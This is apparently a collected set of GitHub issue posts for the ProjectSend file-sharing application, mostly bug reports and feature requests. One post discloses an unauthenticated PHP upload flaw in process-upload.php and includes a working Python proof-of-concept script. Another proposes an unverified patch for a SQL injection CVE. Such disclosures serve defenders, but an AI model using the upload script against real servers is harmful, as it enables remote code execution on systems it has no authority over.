I'm not sure whether this is a bug or a feature but here it goes.

Although a confirmation message is shown, it seems we can't delete a file if we didn't assigned it to a user or a group beforehand.

Steps to reproduce it

1. Upload a file
2. Don't assign it to any user or group
3. Try to delete it using the table interface in manage-file.php

Symptoms

There's no value attribute for the file's checkbox because the id comes from the files_relations table and we don't have any entry there...

And it stays that way during the whole deletion process until the confirmation message.

Possible solutions

1. Show a warning message mentionning we need to assign a file before we can delete it
2. Don't use the files_relations's file id and stick with the id from the files table

Expiration Date
Add confirmation notification for date if selected in the past.
This is always a good idea to have a confirmation if user select a date in the past.

This repo is out-of-date.

The master branch (tagged r559) is apparently 2 revisions behind the current revision on the ProjectSend website (r561).

You will notice when using the master branch, that you are informed that a "new version of ProjectSend is available to download".

This repo needs to be updated to the latest version - please bear this in mind when submitting changes. I have contacted the author to see if there is any intention of updating it here.

Public downloading and expiration could be a configuration option = Yes or No
If No: we should not see this option when managing file and add file

Hi, currently running ProjectSend r582 and all appears fine apart from the fact that the 'download zipped' option for Clients is causing an issue. Process runs through and a zip file is produced but the file is empty. No errors received and the dashboard reports the zip download in the stats. Is anyone else getting this ? Any suggestions as to a solution ? Many thanks.

1. README.md and readme.txt contain the same text. I'd get rid of readme.txt to keep GitHub description.
2. The files still refers to Google Code whilst your Homepage links to GitHub as main development resource.

Version verification should be a configuration option = yes or no
So it will prevent to check version and display the message.

Hi,
Hope PDO will be use in next future.
Thanks for the updates.

On Clients.php and Users.php and manage-files.php list page.
The Action list (drop down list) of the table is pre selected with an action instead of displaying
Select Action like on other pages.
It is better not to have an action pre selected.

To fix it we just need to add an option as the first option.

<option value="none"><?php _e('Select action','cftp_admin'); ?></option>

As part of the client profile, include an option to select a system user to be notified by e-mail when the client uploads a file.

Edit: Instead of just the creator of the client account. An 'Orphaned Client' process if you will.

Hi,
There are few places in the DB that the name is saved instead of the ID.

groups created_by
users created_by
members added_by
actions_log owner_user affected_file_name affected_account_name
files uploader

Have one file that is not assigned, private, not expire on
manage-files.php
Select the file
Select Delete
Click Proceed
Message delete with success appear, but the file is still in the list and in the folder.

If there are other assigned files on
manage-files.php the next file get deleted from the list and the folder!!!

*Nice to have the system should display the file name in the confirmation message.

Everything works fine if the files are around 250Mb, if they're much bigger than this, I get an error during the download. The error is "network reset by peer".
It seems to be related to the execution limit of a php script (30s).

I dug into the code in functions.php and went back to the stackoverflow source. the code does not work for files over 2GB. I have 2 files -4.2GB and 5.1GB that are showing up as 22.71 MB and 957.01 MB.

There is an alternative function I would propose located here: https://github.com/jkuchar/BigFileTools

We could replace Textboxlist with Chosen (MIT), and have only one library to maintain.

Here is an example that allows user to add an item.
http://jimlindstrom.com/extendable_select/example.html

and Chosen have the possibility to display item as a label too.

We should not use TimThumb anymore.

We should replace it by another script
or
if it is only for the logo, remove the upload logo feature and modify the template to use logo.png so we just need to change the dummy logo with site owner logo.

Update Bootstrap to the latest version 3.3.4

how can I change the language or translate it?

The list of TLD's has grown quite large, and anything over 4 characters doesn't seem to work. This should probably be changed to check against a list of valid TLD's, since the list is ever expanding and a regex solution will probably be more trouble than it's worth.

Valid TLD List, Alphabetic: http://data.iana.org/TLD/tlds-alpha-by-domain.txt
See: http://www.regular-expressions.info/email.html

Would be handy if when using custom templates, you can click a preview button to get a popup window with a "Generated" email using the new template so you can see what it will look like. At present the only way to do this is to perform the action that will trigger the generated email (such as add a new user for yourself)

I've uploaded the new files for the latest version. I login, and it still tells me to update.

Let say I have a client Jane Doe and I want to assign a file to this user
If I enter Jane or Jane Doe into the assign to field = No result found!

In fact it's only search on lastname and cannot find group.

PS the search is working ok on groups-edit.php

Note: In my old custom version I use Select2 instead of Chose and the search is working ok.

This problem is on manage-files.php table
File Title, the accents and special characters are not well displayed.

for example : été
will be displayed as and save as in the DB: été

I just upgraded to r582 and I went to switch my php version to 5.5 and as soon as i switch it over I can no longer login witht he admin account. Other people and users can login, just not the admin.

When i switch it back to PHP 5.3 everything works fine.

Any ideas?

Hello,
is he scheduled the ability to create subdirectories for the customers?

Thanks for advance.
Philippe.

NO send email when expired a file at the config "days before expire", but others notification is working. (upload files, new client.. )
my system email is gmail and working great

use..
Debian Jessie
PHP 5.6.9-0+deb8u1
Apache/2.4.10
Projectsend r582

sorry for my poor english, i speak spanish =P

So, I am not sure why, but the site just quit working. The login page is viewable, but afteri login with anyone (admin or user or client) it just shows the top banner and dies after the

Using r582, We were having an issue with deleting files which seems to be similar to that described in bug #29.

Having investigated the issue, it appears to be caused by using id instead of file_id on line 527 of manage-files.php

Change made on file 527 of manage-files.php:
$file_id = $data_file['file_id'];

Issue will only appear if the file_id and relation id are not the same.

Description
The 'process-upload.php' file allows unauthenticated users to upload PHP files resulting in remote code execution as the web server user.

Affected version:
r582

Script:

# less upload.py 

#!/usr/bin/env python
import requests
print"+---------------------------------------+"
print"| ProjectSend File Upload Vulnerability |"
print"+---------------------------------------+"

vuln = raw_input('Vulnerable Site:')
fname = raw_input('EvilFile:')
with open(fname, 'w') as fout:
    fout.write("<?php phpinfo() ?>")
url = vuln +'/process-upload.php' +'?name=' + fname
files = {'file': open(fname, 'rb')}
result = requests.post(url, files=files)
print "===>" +vuln+"/upload/files/"+fname

Result:

# python upload.py 
+---------------------------------------+
| ProjectSend File Upload Vulnerability |
+---------------------------------------+
Vulnerable Site:https://xxxxxxxxx.com
EvilFile:testme.jpg
===>https://xxxxxxxx.com/upload/files/testme.jpg

I'm wondering where the error message template is set for the login page.
I'd like to change alert-error to alert-danger

I'm referring to this:
echo system_message('error',$login_err_message,'login_error');

I have changed the form-validation.php line 16 but it's still looking for alert-error class.
I'm pulling my hair with this one ...

Thanks

New client accounts created by admin doesn't seem to be using a custom template correctly (Its just using the default one)

Hi,

Currently using r582 and everything going really well. Looking ahead I think we will need to place our \Upload\Files location to another datastore which would be presented as another drive letter.

Can anyone give me advice on what and where I would need to change to enable this within Project Send ?

Thanks,

Keith.

copied from gcode

What steps will reproduce the problem?

1. Upload file as user
2. Make it public
3. Assign to a client
4. View Orphaned files and its listed

What is the expected output? What do you see instead?

• If the file is assigned to a client then it shouldnt display as orphaned

What version of the product are you using? On what operating system?
r561 - Linux Ubuntu 12.04

In regard to CVE-2015-2564, I’ve tried to create a quick fix for the vulnerability by updating the code in clients-edit.php & users-edit.php from:

if (isset($_GET['id'])) {
    $client_id = mysql_real_escape_string($_GET['id']);
    /**
    * Check if the id corresponds to a real client.
    * Return 1 if true, 2 if false.
    **/
    $page_status = (client_exists_id($client_id)) ? 1 : 2;
}
else {
    /**
    * Return 0 if the id is not set.
    */
    $page_status = 0;
}

To:

if (isset($_GET['id'])) {
    $user_id = mysql_real_escape_string($_GET['id']);

    /**
     * Make sure we're getting an int
     * This is a "better-than-nothing" fix for CVE-2015-2564
     * Ideally, I would be using PDO and prepared statements     
     */
    if(filter_var($user_id, FILTER_VALIDATE_INT))
    {
        /**
         * Check if the id corresponds to a real client.
         * Return 1 if true, 2 if false.
         **/
        $page_status = (client_exists_id($user_id)) ? 1 : 2;
    } else {
        $page_status = 0;
    }

}
else {
    /**
     * Return 0 if the id is not set.
     */
    $page_status = 0;
}

Note, the example above comes from users-edit.php. For clients-edit.php replace ‘$user_id’ with ‘$client_id’

I’m more of the code shifter-arounder than a coder, so it would be helpful is someone could validate this fix.

I recommend that you should add File Preview feature to ProjectSend, thanks

I have a new installation of PS and have changed the tables prefix from "tbl_" to "ps_" in sys.config.php before proceed to install.
PS install finished installation (successfully), but created the tables with "tbl_" prefix instead.
When I hit the "log in" button, I was redirected to .../install/index.php and could not log into the system.
If I tried to configure the system again, the response was that it already had an entry.
The only way to get out of this situation was to reconfigure sys.config.php setting TABLES_PREFIX back to "tbl_".

Nice to have display file ext in email message.
When client upload file we can see the file name, but I think this should be better to see the file ext as well.

Also that will be great to use branding logo for in the email template.

The Lib seems to be common, so i only renamed the file and modified upload-from-computer.php to use the new file. I hope this helps.

Responsive mode doesn't work in smartphones help please!!!

How can i Fix that problem?

Using the system options security tab file extensions can be removed and saved without a problem.

When I try to add an extension a new empty white extension box appears that allows me to enter the file extension text.

It does not seem to be possible to create a new extension box to add a second one and more important the added extension is not being saved after hitting the update all options button.

Not any error is provided at the webinterface nor at the webservers (error) log.

As a workaround I have added the extensions directly in the database.

PS. I have tried this using both Firefox and Internet explorer without any difference.

Clients not able to update password in their accounts after upgrading to r572. The page does not load. Hitting Enter key a second time reloads the page but the password is not saved.

Ok sorry I misundestood the function default_footer_info(false);
I thought nothing was supposed to appear in the footer when not logged.
But in fact it will display different footer information, this is not a bug it is working ok.

home-news-widget.php file should have user level restriction and not be visible if we are not logged
through direct url.

I love this software, just what I need without the bloat!

I just came across one issue that would be an easy fix, I have a client where I need to send two emails to two separate addresses when a file is uploaded. I can't use a comma or semicolon to add multiple addresses in the client edit email field, would it be possible to add this functionality?

Thanks for the great work!

Stan

Only Admin and Account Manager can delete file.
Uploader and Client cannot delete file.

Client and upload should at least delete the file they upload.
Let say a client have uploaded the wrong file, there is no way for him to delete the file...
Let say there are sensitive data in this file...

We could add a settings for this
so admin can decide who can delete file.
For all file or only the file the user upload.

This is a feature request.

By default I have client uploading disabled but I have a need where one or two are required to upload. Current options mean its either globally enabled, or globally disabled.

Would be nice if you had the option to enable it on a per-user basis

Hi,

I'm testing the actual master version.

After the installation it's keep loading the install page, it's like the redirection is not working properly.
The installation information have been saved to the database.
Even if I use main index it's redirecting to the install page

Any clue?

Hi.

Default templates are quite nice but to change only minor thing one needs to write whole template from scratch. It would be nice to have default code right there in text areas ready for quick tweaks.

PS And in that case reset to default button would be nice. Thanks!

When client uploads new version of alredy uploaded file there is no information about that change. So i suggest to add new column: modified date. Field should be updated every time a new version of file is uploaded. I think that it would be better to display on manage-files modified date instead of timestamp.

What steps will reproduce the problem?

1. Upload file with letter ó in description. Assign to a client.
2. Go to Clients -> Manage Clients. View as a client.
3. Letter ó in description is improperly shown as ó

What is the expected output? What do you see instead?

What version of the product are you using? On what operating system?
r561. Debian 8 (Jessie). Same situation with r582.

Please provide any additional information below.
Mysql/MariaDB database is in utf8 mode. Other letters are shown and stored in a proper form.

Info on the old tracker:
https://code.google.com/p/clients-oriented-ftp/issues/detail?id=537&thanks=537&ts=1432194897